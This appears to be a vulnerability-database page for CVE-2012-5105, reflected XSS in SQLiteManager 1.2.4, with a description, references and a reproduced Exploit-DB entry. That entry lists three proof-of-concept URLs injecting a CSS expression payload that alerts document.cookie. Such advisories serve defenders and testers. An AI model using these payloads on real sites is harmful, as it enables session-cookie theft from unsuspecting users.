CVE-2012-5105
Description
Multiple cross-site scripting (XSS) vulnerabilities in SQLiteManager 1.2.4 allow remote attackers to inject arbitrary web script or HTML via the dbsel parameter to (1) main.php or (2) index.php; or (3) nsextt parameter to index.php.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
SQLiteManager 1.2.4 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/51294/info
SQLiteManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
SQLiteManager 1.2.4 is vulnerable; other versions may also be affected.
IE-only
http://www.example.com/sqlite/?nsextt=" stYle="x:expre/**/ssion(alert(document.cookie))
http://www.example.com/sqlite/index.php?dbsel=" stYle="x:expre/**/ssion(alert(document.cookie))
http://www.example.com/sqlite/index.php?nsextt=" stYle="x:expre/**/ssion(alert(document.cookie))
SQLiteManager 1.2.4 - 'main.php?dbsel' Cross-Site Scripting
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| sqlitemanager | sqlitemanager | 1.2.4 | |
References
- http://archives.neohapsis.com/archives/bugtraq/2012-01/0035.html
- http://secunia.com/advisories/28642
- http://www.osvdb.org/78137
- http://www.osvdb.org/78138
- http://www.securityfocus.com/bid/51294
- https://exchange.xforce.ibmcloud.com/vulnerabilities/72141
- http://archives.neohapsis.com/archives/bugtraq/2012-01/0035.html
- http://secunia.com/advisories/28642
- http://www.osvdb.org/78137
- http://www.osvdb.org/78138
- http://www.securityfocus.com/bid/51294
- https://exchange.xforce.ibmcloud.com/vulnerabilities/72141
CWEs
CWE-79
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.